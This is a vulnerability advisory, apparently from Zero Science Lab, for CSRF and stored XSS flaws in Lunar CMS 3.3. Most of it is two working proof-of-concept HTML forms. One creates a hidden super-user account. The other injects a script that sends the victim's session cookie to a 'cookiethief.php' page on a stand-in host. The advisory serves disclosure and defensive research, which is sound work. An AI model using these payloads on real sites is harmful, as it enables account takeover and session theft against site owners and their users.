83 lines
No EOL
2.5 KiB
Text
83 lines
No EOL
2.5 KiB
Text
<!--
|
|
|
|
Lunar CMS 3.3 CSRF And Stored XSS Vulnerability
|
|
|
|
|
|
Vendor: Lunar CMS
|
|
Product web page: http://www.lunarcms.com
|
|
Affected version: 3.3
|
|
|
|
Summary: Lunar CMS is a freely distributable open sourcecontent
|
|
management system written for use on servers running the ever so
|
|
popular PHP5 & MySQL.
|
|
|
|
Desc: Lunar CMS suffers from a cross-site request forgery and a
|
|
stored xss vulnerabilities. The application allows users to perform
|
|
certain actions via HTTP requests without performing any validity
|
|
checks to verify the requests. This can be exploited to perform
|
|
certain actions with administrative privileges if a logged-in user
|
|
visits a malicious web site. Input passed to the 'subject' and 'email'
|
|
POST parameters thru the 'Contact Form' extension/module is not properly
|
|
sanitised before being returned to the user. This can be exploited to
|
|
execute arbitrary HTML and script code in a user's browser session in
|
|
context of an affected site.
|
|
|
|
Tested on: Apache/2.4.7 (Win32)
|
|
PHP/5.5.6
|
|
MySQL 5.6.14
|
|
|
|
|
|
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2014-5188
|
|
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5188.php
|
|
|
|
|
|
11.06.2014
|
|
|
|
-->
|
|
|
|
|
|
|
|
CSRF Add Admin
|
|
===============
|
|
|
|
<html>
|
|
<body>
|
|
<form action="http://localhost/lunarcms/admin/user_create.php" method="POST">
|
|
<input type="hidden" name="name" value="Hacker" />
|
|
<input type="hidden" name="email" value="lab@zeroscience.mk" />
|
|
<input type="hidden" name="password1" value="251ftw" />
|
|
<input type="hidden" name="password2" value="251ftw" />
|
|
<input type="hidden" name="access" value="0" />
|
|
<input type="hidden" name="Submit" value="submit" />
|
|
<input type="submit" value="Submit form" />
|
|
</form>
|
|
</body>
|
|
</html>
|
|
|
|
Access levels:
|
|
|
|
0: Super user
|
|
1: Admin
|
|
2: Website only
|
|
|
|
|
|
|
|
CSRF Stored XSS (Session Hijack)
|
|
=================================
|
|
|
|
<html>
|
|
<body>
|
|
<form action="http://localhost/lunarcms/admin/extensions.php?ext=contact_form&top" method="POST">
|
|
<input type="hidden" name="email" value='"><script>alert(1);</script>' />
|
|
<input type="hidden" name="error" value="2" />
|
|
<input type="hidden" name="sent" value="1" />
|
|
<input type="hidden" name="subject" value='"><script>var x = new Image();x.src='http://www.example.com/cookiethief.php?cookie='+document.cookie;</script>' />
|
|
<input type="hidden" name="submit" value="submit" />
|
|
<input type="submit" value="Submit form" />
|
|
</form>
|
|
</body>
|
|
</html> |